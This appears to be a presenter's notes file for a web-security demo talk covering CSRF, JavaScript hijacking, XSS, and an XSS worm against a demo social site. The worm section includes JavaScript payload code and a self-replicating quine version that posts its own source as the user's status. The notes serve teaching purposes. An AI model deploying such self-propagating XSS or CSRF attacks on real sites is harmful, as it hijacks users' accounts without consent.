Demo 1: CSRF
------------
Introduce BlabberOne
blabberone.sitepen.com
Show:
all users
making friends
sending messages
getting random friends
Ensure the audience has seen tweets
Hop over to Twitter
Check out tweet from Dion
http://localhost:8080/csrf-demo/
CSRF to remove all tweets
The point: The page that Dion linked to, used CSRF to abuse my superuser privs on blabberone to delete all the tweets
Demo 2: JavaScript Hijack
-------------------------
Visit http://localhost:8080/csrf-demo/hijack.html
Point out that this is using CSRF to READ
Demo 3: XSS
-----------
Change my BG to black
Jeremiah: log into blabberone, and message this:
Some random message
Demo 4: Worm
------------
If we get time:
Worm notes
----------
This is the payload:
var p = window.parent;
p.Network.getCurrentUser(function(user) {
if (user.background != '000') {
p.Network.setBackground('000');
p.document.body.style.background = '#000';
window.parent.Network.updateStatus(SOURCE);
}
}
This is a quine in javascript:
var s="var s=X;var q=String.fromCharCode(34);console.log(s.replace(/X/,q+s+q));";var q=String.fromCharCode(34); console.log(s.replace(/X/,q+s+q));
This is another:
(function quine(){return '('+quine+')();';})();
This is the payload applied to the first quine, however this doesn't have a way to spark the script:
var s="var s=X;var q=String.fromCharCode(34);var p = window.parent;p.Network.getCurrentUser(function(user){if(user.background!='000'){p.Network.setBackground('000');p.document.body.style.background='#000';window.parent.Network.updateStatus(s.replace(/X/,q+s+q));}};";var q=String.fromCharCode(34);var p = window.parent;p.Network.getCurrentUser(function(user){if(user.background!='000'){p.Network.setBackground('000');p.document.body.style.background='#000';window.parent.Network.updateStatus(s.replace(/X/,q+s+q));}};
Using script decompilation (gives syntax error):
Initial random message
XSS sources:
